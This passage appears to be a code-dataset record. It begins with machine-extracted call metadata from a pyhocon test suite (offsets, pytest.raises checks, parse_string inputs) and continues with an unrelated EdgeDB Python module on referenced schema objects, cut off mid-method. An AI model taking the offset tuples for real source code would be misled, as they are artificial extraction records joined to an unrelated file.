abc\n """\n )\n', (22232, 22324), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22359, 22401), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22372, 22401), False, 'import pytest\n'), ((22415, 22537), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent} def\n """'], {}), '(\n """\n common_modules = abc ${non_existent} def\n """\n )\n', (22441, 22537), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22620, 22659), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (22633, 22659), False, 'import pytest\n'), ((22673, 22834), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """\n )\n', (22699, 22834), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22869, 22908), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), 
'(ConfigWrongTypeException)\n', (22882, 22908), False, 'import pytest\n'), ((22922, 23083), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """\n )\n', (22948, 23083), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23118, 23157), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23131, 23157), False, 'import pytest\n'), ((23171, 23335), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23197, 23335), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23370, 23409), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23383, 23409), False, 'import pytest\n'), ((23423, 23584), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """\n )\n', (23449, 23584), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23619, 23658), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23632, 23658), False, 'import pytest\n'), ((23672, 23833), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """\n )\n', (23698, 23833), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23868, 23907), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23881, 23907), False, 'import pytest\n'), ((23921, 24085), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23947, 24085), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27276, 27318), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27289, 27318), False, 'import pytest\n'), ((27332, 27408), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n """'], {}), '("""\n x = ${x}\n """)\n', (27358, 27408), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27509, 27551), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27522, 27551), False, 'import pytest\n'), ((27565, 27671), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n x = ${x}\n """'], {}), '(\n """\n x = ${x}\n x = ${x}\n """)\n', (27591, 27671), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29914, 29956), 'pytest.raises', 'pytest.raises', 
(['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (29927, 29956), False, 'import pytest\n'), ((29970, 30090), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x} {y: 1}\n x = ${x.y}\n """'], {}), '(\n """\n x = ${x} {y: 1}\n x = ${x.y}\n """\n )\n', (29996, 30090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34625, 34660), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34638, 34660), False, 'import pytest\n'), ((34674, 34725), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules [perl]"""'], {}), "('common_modules [perl]')\n", (34700, 34725), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34740, 34769), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (34753, 34769), False, 'import pytest\n'), ((34783, 34840), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules {} {perl: 1}"""'], {}), "('common_modules {} {perl: 1}')\n", (34809, 34840), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34855, 34890), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34868, 34890), False, 'import pytest\n'), ((34904, 35038), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """'], {}), '(\n """\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """\n )\n', (34930, 35038), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35093, 35128), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35106, 35128), False, 'import pytest\n'), ((35142, 35290), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n f: 5\n g\n }\n """'], {}), '(\n """\n a = {\n f: 5\n g\n }\n """\n )\n', (35168, 35290), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35312, 35347), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35325, 35347), False, 'import pytest\n'), ((35361, 35398), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {g}"""'], {}), "('a = {g}')\n", (35387, 35398), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35446, 35478), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (35473, 35478), False, 'import tempfile\n'), ((37355, 37377), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (37368, 37377), False, 'import pytest\n'), ((37391, 37585), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """\n )\n', (37417, 37585), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37823, 37848), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (37836, 37848), False, 'import pytest\n'), ((37862, 37923), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon/config_parser.py"""'], {}), 
"('pyhocon/config_parser.py')\n", (37895, 37923), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37987, 38013), 'pytest.raises', 'pytest.raises', (['ImportError'], {}), '(ImportError)\n', (38000, 38013), False, 'import pytest\n'), ((38027, 38090), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""non_existent_module:foo.py"""'], {}), "('non_existent_module:foo.py')\n", (38060, 38090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((38222, 38257), 'os.path.join', 'os.path.join', (['temp_dir', '"""my_module"""'], {}), "(temp_dir, 'my_module')\n", (38234, 38257), False, 'import os\n'), ((38284, 38319), 'os.path.join', 'os.path.join', (['module_dir', '"""my.conf"""'], {}), "(module_dir, 'my.conf')\n", (38296, 38319), False, 'import os\n'), ((38413, 38433), 'os.mkdir', 'os.mkdir', (['module_dir'], {}), '(module_dir)\n', (38421, 38433), False, 'import os\n'), ((38824, 38980), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: 2\n include package("my_module:my.conf")\n """'], {}), '(\n """\n a: 1\n b: 2\n include package("my_module:my.conf")\n """\n )\n', (38850, 38980), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((39187, 39230), 'shutil.rmtree', 'shutil.rmtree', (['temp_dir'], {'ignore_errors': '(True)'}), '(temp_dir, ignore_errors=True)\n', (39200, 39230), False, 'import shutil\n'), ((39392, 39424), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (39419, 39424), False, 'import tempfile\n'), ((40489, 40521), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40516, 40521), False, 'import tempfile\n'), ((40935, 40967), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40962, 40967), False, 'import tempfile\n'), ((41071, 41276), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['("""\n {\n a : { include """ + \'"\' + fdin.\n name +\n """" }\n a : { x : 42 }\n }\n """\n )'], {}), '(\n """\n {\n a : { include """ + \'"\' +\n fdin.name +\n """" }\n a : { x : 42 }\n }\n """\n )\n', (41097, 41276), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45051, 45093), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (45064, 45093), False, 'import pytest\n'), ((45107, 45243), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${b}\n b = ${c}\n c = ${a}\n """'], {}), '(\n """\n a = ${b}\n b = ${c}\n c = ${a}\n """\n )\n', (45133, 45243), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60039, 60069), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (60052, 60069), False, 'import pytest\n'), ((64449, 64488), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (64462, 64488), False, 'import pytest\n'), ((64575, 64612), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (64588, 64612), False, 'import pytest\n'), ((64683, 64713), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64696, 64713), False, 'import pytest\n'), ((64786, 64816), 'pytest.raises', 
'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64799, 64816), False, 'import pytest\n'), ((64889, 64919), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64902, 64919), False, 'import pytest\n'), ((64994, 65033), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (65007, 65033), False, 'import pytest\n'), ((69048, 69066), 'json.loads', 'json.loads', (['source'], {}), '(source)\n', (69058, 69066), False, 'import json\n'), ((3276, 3293), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3282, 3293), True, 'from datetime import timedelta as period\n'), ((3320, 3337), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3326, 3337), True, 'from datetime import timedelta as period\n'), ((3364, 3381), 'datetime.timedelta', 'period', ([], {'minutes': '(2)'}), '(minutes=2)\n', (3370, 3381), True, 'from datetime import timedelta as period\n'), ((3403, 3420), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3409, 3420), True, 'from datetime import timedelta as period\n'), ((3441, 3458), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3447, 3458), True, 'from datetime import timedelta as period\n'), ((3518, 3535), 'datetime.timedelta', 'period', ([], {'seconds': '(4)'}), '(seconds=4)\n', (3524, 3535), True, 'from datetime import timedelta as period\n'), ((3562, 3579), 'datetime.timedelta', 'period', ([], {'seconds': '(5)'}), '(seconds=5)\n', (3568, 3579), True, 'from datetime import timedelta as period\n'), ((3601, 3618), 'datetime.timedelta', 'period', ([], {'seconds': '(6)'}), '(seconds=6)\n', (3607, 3618), True, 'from datetime import timedelta as period\n'), ((3676, 3691), 'datetime.timedelta', 'period', ([], {'hours': '(7)'}), '(hours=7)\n', (3682, 3691), True, 'from datetime import timedelta as period\n'), ((3716, 3731), 'datetime.timedelta', 'period', ([], {'hours': '(8)'}), '(hours=8)\n', (3722, 3731), True, 'from datetime import timedelta as period\n'), ((3753, 3768), 'datetime.timedelta', 'period', ([], {'hours': '(9)'}), '(hours=9)\n', (3759, 3768), True, 'from datetime import timedelta as period\n'), ((3796, 3812), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (3802, 3812), True, 'from datetime import timedelta as period\n'), ((3838, 3854), 'datetime.timedelta', 'period', ([], {'weeks': '(11)'}), '(weeks=11)\n', (3844, 3854), True, 'from datetime import timedelta as period\n'), ((3877, 3893), 'datetime.timedelta', 'period', ([], {'weeks': '(12)'}), '(weeks=12)\n', (3883, 3893), True, 'from datetime import timedelta as period\n'), ((3920, 3935), 'datetime.timedelta', 'period', ([], {'days': '(10)'}), '(days=10)\n', (3926, 3935), True, 'from datetime import timedelta as period\n'), ((3960, 3975), 'datetime.timedelta', 'period', ([], {'days': '(11)'}), '(days=11)\n', (3966, 3975), True, 'from datetime import timedelta as period\n'), ((3998, 4013), 'datetime.timedelta', 'period', ([], {'days': '(12)'}), '(days=12)\n', (4004, 4013), True, 'from datetime import timedelta as period\n'), ((4049, 4073), 'datetime.timedelta', 'period', ([], {'microseconds': '(110)'}), '(microseconds=110)\n', (4055, 4073), True, 'from datetime import timedelta as period\n'), ((4107, 4131), 'datetime.timedelta', 'period', ([], {'microseconds': '(111)'}), '(microseconds=111)\n', (4113, 4131), True, 'from datetime import timedelta as period\n'), ((4160, 4184), 'datetime.timedelta', 
'period', ([], {'microseconds': '(112)'}), '(microseconds=112)\n', (4166, 4184), True, 'from datetime import timedelta as period\n'), ((4212, 4236), 'datetime.timedelta', 'period', ([], {'microseconds': '(113)'}), '(microseconds=113)\n', (4218, 4236), True, 'from datetime import timedelta as period\n'), ((4261, 4285), 'datetime.timedelta', 'period', ([], {'microseconds': '(114)'}), '(microseconds=114)\n', (4267, 4285), True, 'from datetime import timedelta as period\n'), ((4321, 4348), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(110)'}), '(milliseconds=110)\n', (4330, 4348), False, 'from datetime import timedelta\n'), ((4382, 4409), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(111)'}), '(milliseconds=111)\n', (4391, 4409), False, 'from datetime import timedelta\n'), ((4438, 4465), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(112)'}), '(milliseconds=112)\n', (4447, 4465), False, 'from datetime import timedelta\n'), ((4493, 4520), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(113)'}), '(milliseconds=113)\n', (4502, 4520), False, 'from datetime import timedelta\n'), ((4545, 4572), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(114)'}), '(milliseconds=114)\n', (4554, 4572), False, 'from datetime import timedelta\n'), ((4607, 4629), 'datetime.timedelta', 'period', ([], {'microseconds': '(0)'}), '(microseconds=0)\n', (4613, 4629), True, 'from datetime import timedelta as period\n'), ((4665, 4688), 'datetime.timedelta', 'period', ([], {'microseconds': '(11)'}), '(microseconds=11)\n', (4671, 4688), True, 'from datetime import timedelta as period\n'), ((4725, 4750), 'datetime.timedelta', 'period', ([], {'microseconds': '(1110)'}), '(microseconds=1110)\n', (4731, 4750), True, 'from datetime import timedelta as period\n'), ((4782, 4807), 'datetime.timedelta', 'period', ([], {'microseconds': '(1120)'}), '(microseconds=1120)\n', (4788, 4807), True, 'from datetime import timedelta as period\n'), ((4838, 4863), 'datetime.timedelta', 'period', ([], {'microseconds': '(1130)'}), '(microseconds=1130)\n', (4844, 4863), True, 'from datetime import timedelta as period\n'), ((4892, 4917), 'datetime.timedelta', 'period', ([], {'microseconds': '(1140)'}), '(microseconds=1140)\n', (4898, 4917), True, 'from datetime import timedelta as period\n'), ((5639, 5655), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5645, 5655), True, 'from datetime import timedelta as period\n'), ((5657, 5674), 'datetime.timedelta', 'period', ([], {'minutes': '(5)'}), '(minutes=5)\n', (5663, 5674), True, 'from datetime import timedelta as period\n'), ((69195, 69218), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69208, 69218), False, 'from dateutil.relativedelta import relativedelta\n'), ((69244, 69267), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69257, 69267), False, 'from dateutil.relativedelta import relativedelta\n'), ((69293, 69316), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(2)'}), '(months=2)\n', (69306, 69316), False, 'from dateutil.relativedelta import relativedelta\n'), ((69339, 69362), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69352, 69362), False, 'from dateutil.relativedelta import relativedelta\n'), ((69384, 69407), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69397, 69407), False, 
'from dateutil.relativedelta import relativedelta\n'), ((69465, 69487), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69478, 69487), False, 'from dateutil.relativedelta import relativedelta\n'), ((69512, 69534), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69525, 69534), False, 'from dateutil.relativedelta import relativedelta\n'), ((69559, 69581), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(2)'}), '(years=2)\n', (69572, 69581), False, 'from dateutil.relativedelta import relativedelta\n'), ((69603, 69625), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69616, 69625), False, 'from dateutil.relativedelta import relativedelta\n'), ((69646, 69668), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69659, 69668), False, 'from dateutil.relativedelta import relativedelta\n'), ((38451, 38490), 'os.path.join', 'os.path.join', (['module_dir', '"""__init__.py"""'], {}), "(module_dir, '__init__.py')\n", (38463, 38490), False, 'import os\n'), ((44017, 44068), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a=${b}"""'], {'resolve': '(False)'}), "('a=${b}', resolve=False)\n", (44043, 44068), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n')] |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import hashlib
from edb import errors
from edb.common import struct
from edb.edgeql import ast as qlast
from . import delta as sd
from . import inheriting
from . import objects as so
from . import schema as s_schema
from . import name as sn
from . import utils
ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject')
ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT',
bound='ReferencedInheritingObject')
class ReferencedObject(so.DerivableObject):
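    """A schema object which is defined as part of another (referring) object.

    A typical example is a concrete link defined on an object type: the
    type is the "subject" (referrer) of the link, and the link is stored
    in a refdict field of the type.
    """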
#: True if the object has an explicit definition and is not
#: purely inherited.
is_local = so.SchemaField(
bool,
default=False,
inheritable=False,
compcoef=0.909,
reflection_method=so.ReflectionMethod.AS_LINK,
)
def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]:
# NB: classes that inherit ReferencedObject define a `get_subject`
# method dynamically, with `subject = SchemaField`
raise NotImplementedError
def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]:
return self.get_subject(schema)
def delete(self, schema: s_schema.Schema) -> s_schema.Schema:
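        """Remove this object from *schema* by applying a delete delta."""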
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.DeleteObject, type(self))
cmd = cmdcls(classname=self.get_name(schema))
context = sd.CommandContext(
modaliases={},
schema=schema,
disable_dep_verification=True,
)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self)
parent_cmd.add(cmd)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
schema = delta.apply(schema, context)
return schema
def derive_ref(
self: ReferencedT,
schema: s_schema.Schema,
referrer: so.QualifiedObject,
*qualifiers: str,
mark_derived: bool = False,
attrs: Optional[Dict[str, Any]] = None,
dctx: Optional[sd.CommandContext] = None,
derived_name_base: Optional[str] = None,
inheritance_merge: bool = True,
preserve_path_id: Optional[bool] = None,
refdict_whitelist: Optional[AbstractSet[str]] = None,
transient: bool = False,
name: Optional[str] = None,
**kwargs: Any,
) -> Tuple[s_schema.Schema, ReferencedT]:
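        """Derive a new object from this one, owned by *referrer*.

        The derived object is named after the referrer and *qualifiers*
        (unless an explicit *name* is given), has this object as its sole
        base, and is created (or altered, if it already exists on the
        referrer) by applying a delta to the schema.  Returns the updated
        schema and the derived object.
        """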
if name is None:
derived_name: str = self.get_derived_name(
schema, referrer, *qualifiers,
mark_derived=mark_derived,
derived_name_base=derived_name_base)
else:
derived_name = name
if self.get_name(schema) == derived_name:
raise errors.SchemaError(
f'cannot derive {self!r}({derived_name}) from itself')
derived_attrs: Dict[str, object] = {}
if attrs is not None:
derived_attrs.update(attrs)
derived_attrs['name'] = derived_name
derived_attrs['bases'] = so.ObjectList.create(
schema, [self])
mcls = type(self)
referrer_class = type(referrer)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for_name(schema, derived_name)
refcoll = referrer.get_field_value(schema, refdict.attr)
existing = refcoll.get(schema, refname, default=None)
if existing is not None:
cmdcls: Type[sd.Command] = \
sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject,
type(self))
else:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.CreateObject, type(self))
cmd = cmdcls(classname=derived_name)
for k, v in derived_attrs.items():
cmd.set_attribute_value(k, v)
if existing is not None:
new_bases = derived_attrs['bases']
old_bases = existing.get_bases(schema)
if new_bases != old_bases:
assert isinstance(new_bases, so.ObjectList)
removed_bases, added_bases = inheriting.delta_bases(
[b.get_name(schema) for b in old_bases.objects(schema)],
[b.get_name(schema) for b in new_bases.objects(schema)],
)
rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
inheriting.RebaseInheritingObject, type(self))
rebase_cmd = rebase_cmdcls(
classname=derived_name,
added_bases=added_bases,
removed_bases=removed_bases,
)
cmd.add(rebase_cmd)
context = sd.CommandContext(
modaliases={},
schema=schema,
)
assert isinstance(cmd, sd.ObjectCommand)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self, referrer=referrer)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
if not inheritance_merge:
context.current().inheritance_merge = False
if refdict_whitelist is not None:
context.current().inheritance_refdicts = refdict_whitelist
if mark_derived:
context.current().mark_derived = True
if transient:
context.current().transient_derivation = True
if preserve_path_id:
context.current().preserve_path_id = True
parent_cmd.add(cmd)
schema = delta.apply(schema, context)
derived: ReferencedT = schema.get(derived_name)
return schema, derived
def get_verbosename(
self,
schema: s_schema.Schema,
*,
with_parent: bool = False,
) -> str:
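        """Return a verbose name, optionally including the subject's name."""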
vn = super().get_verbosename(schema)
if with_parent:
subject = self.get_subject(schema)
if subject is not None:
pn = subject.get_verbosename(schema, with_parent=True)
return f'{vn} of {pn}'
return vn
class ReferencedInheritingObject(
so.DerivableInheritingObject,
ReferencedObject,
):
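    """A referenced object that also participates in inheritance."""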
# Indicates that the object has been declared as
# explicitly inherited.
declared_overloaded = so.SchemaField(
bool,
default=False,
compcoef=None,
introspectable=False,
inheritable=False,
ephemeral=True,
)
def get_implicit_bases(
self: ReferencedInheritingObjectT,
schema: s_schema.Schema,
) -> List[ReferencedInheritingObjectT]:
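        """Return the non-generic (i.e. specialized) bases of this object.

        Such bases are the objects this one was implicitly inherited
        from via the referrer's own bases, as opposed to explicitly
        declared generic bases.
        """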
return [
b for b in self.get_bases(schema).objects(schema)
if not b.generic(schema)
]
class ReferencedObjectCommandMeta(sd.ObjectCommandMeta):
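    """Metaclass for referenced object commands.

    Lets subclasses declare the command context class of their referring
    object via the *referrer_context_class* keyword argument.
    """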
_transparent_adapter_subclass: ClassVar[bool] = True
_referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None
def __new__(mcls,
name: str,
bases: Tuple[type, ...],
clsdct: Dict[str, Any],
*,
referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None,
**kwargs: Any
) -> ReferencedObjectCommandMeta:
cls = super().__new__(mcls, name, bases, clsdct, **kwargs)
assert isinstance(cls, ReferencedObjectCommandMeta)
if referrer_context_class is not None:
cls._referrer_context_class = referrer_context_class
return cls
class ReferencedObjectCommandBase(
sd.QualifiedObjectCommand[ReferencedT],
metaclass=ReferencedObjectCommandMeta,
):
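    """Common base for all commands that operate on referenced objects."""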
@classmethod
def get_referrer_context_class(
cls,
) -> Type[sd.ObjectCommandContext[so.Object]]:
if cls._referrer_context_class is None:
raise TypeError(
f'referrer_context_class is not defined for {cls}')
return cls._referrer_context_class
@classmethod
def get_referrer_context(
cls,
context: sd.CommandContext,
) -> Optional[sd.ObjectCommandContext[so.Object]]:
"""Get the context of the command for the referring object, if any.
E.g. for a `create/alter/etc concrete link` command this would
be the context of the `create/alter/etc type` command.
"""
ctxcls = cls.get_referrer_context_class()
ctx = context.get(ctxcls) # type: ignore
return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx)
@classmethod
def get_referrer_context_or_die(
cls,
context: sd.CommandContext,
) -> sd.ObjectCommandContext[so.Object]:
ctx = cls.get_referrer_context(context)
if ctx is None:
raise RuntimeError(f'no referrer context for {cls}')
return ctx
class StronglyReferencedObjectCommand(
ReferencedObjectCommandBase[ReferencedT]
):
pass
class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]):
@classmethod
def _classname_from_ast(cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: sd.CommandContext
) -> sn.Name:
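        """Compute the fully-qualified name of the target object.

        If this command is nested in a referrer's command, the name is
        the specialized name derived from the base name, the referrer's
        name and any extra qualifiers.
        """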
name = super()._classname_from_ast(schema, astnode, context)
parent_ctx = cls.get_referrer_context(context)
if parent_ctx is not None:
assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand)
referrer_name = parent_ctx.op.classname
base_name: str
try:
base_ref = utils.ast_to_object(
astnode.name,
modaliases=context.modaliases,
schema=schema,
)
except errors.InvalidReferenceError:
base_name = sn.Name(name)
else:
base_name = base_ref.get_name(schema)
quals = cls._classname_quals_from_ast(
schema, astnode, base_name, referrer_name, context)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
name = sn.Name(name=pnn, module=referrer_name.module)
assert isinstance(name, sn.Name)
return name
@classmethod
def _classname_from_name(
cls,
name: sn.SchemaName,
referrer_name: sn.SchemaName,
) -> sn.Name:
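        """Recompute the specialized name of *name* for *referrer_name*."""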
base_name = sn.shortname_from_fullname(name)
quals = cls._classname_quals_from_name(name)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
return sn.Name(name=pnn, module=referrer_name.module)
@classmethod
def _classname_quals_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
base_name: str,
referrer_name: str,
context: sd.CommandContext,
) -> Tuple[str, ...]:
return ()
@classmethod
def _classname_quals_from_name(
cls,
name: sn.SchemaName,
) -> Tuple[str, ...]:
return ()
@classmethod
def _name_qual_from_exprs(cls,
schema: s_schema.Schema,
exprs: Iterable[str]) -> str:
